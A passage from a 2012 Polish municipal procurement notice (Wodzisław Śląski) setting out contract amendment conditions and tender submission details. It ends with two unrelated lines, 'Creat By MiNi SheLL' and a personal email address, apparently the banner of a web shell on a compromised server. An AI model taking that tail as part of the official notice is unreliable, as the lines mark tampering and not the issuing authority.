3. Wystąpienia konieczności zmiany osób wskazanych w ofercie (śmierć, choroba, ustania stosunku pracy lub inne zdarzenia losowe lub inne przyczyny niezależne od Projektanta) przy pomocy, których Projektant realizuje przedmiot umowy. Przedmiotowa zmiana jest możliwa pod warunkiem zaproponowania innych osób, spełniających na dzień składania ofert, warunki określone przez zamawiającego w specyfikacji. 
4. Zmiany podwykonawcy, który zgodnie z art.26 ust.2b ustawy Prawo zamówień publicznych będzie podmiotem udostępniającym zasoby niezbędne do realizacji zamówienia. W takim przypadku wykonawca jest zobowiązany zaproponować innego podwykonawcę spełniającego na dzień składania ofert warunki określone przez zamawiającego w specyfikacji wraz z załączeniem wszystkich wymaganych oświadczeń i dokumentów określonych w specyfikacji. 
5. Zmiany podwykonawcy, o którym mowa w art.36 ust.4 ustawy Prawo zamówień publicznych, pod warunkiem spełnienia warunków określonych w §13 nn. umowy.  
6. Wystąpienia konieczności zmian osób Projektanta, w przypadku gdy zamawiający uzna, że osoby te nie wykonują należycie swoich obowiązków. Projektant obowiązany jest dokonać zmiany tych osób, na inne spełniające na dzień składania ofert warunki określone w specyfikacji, w terminie nie dłuższym niż 14 dni od daty złożenia wniosku zamawiającego. 
7. Wystąpienia konieczności wprowadzenia zmian w harmonogramie realizacji przedmiotu umowy poprzez: przesunięcie w czasie, uszczegółowienie spowodowane obiektywnymi czynnikami, niezależnymi od wykonawcy, uniemożliwiającymi realizację przedmiotu umowy zgodnie z pierwotną wersją harmonogramu. 
8. Zmiana terminu realizacji przedmiotu umowy z przyczyn niezależnych od Projektanta, a także z np. wystąpienia zwłoki w wydaniu przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń. 
9. Wystąpienia konieczności wprowadzenia zmian spowodowanych następującymi okolicznościami: 
a) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie ze szczegółowym opisem, 
b) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana numeru rachunku bankowego), 
c) zmiany danych teleadresowych, 
d) zmiana obowiązującej stawki VAT, 
e) rezygnacja przez zamawiającego z realizacji części przedmiotu umowy. 
f)  udzielenie zamówień dodatkowych
10. W przypadku wystąpienia któregokolwiek ze zdarzeń wymienionych w ust. 1 do 10 termin realizacji przedmiotu umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.wodzislaw-slaski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Wodzisławia Śląskiego
Biuro Zamówień Publicznych
ul. Bogumińska 4b
44-300 Wodzisław Śląski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2012 godzina 10:30, miejsce: Urząd Miasta Wodzisławia Śląskiego
Biuro Obsługi Klienta
ul. Bogumińska 4b
44-300 Wodzisław Śląski.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com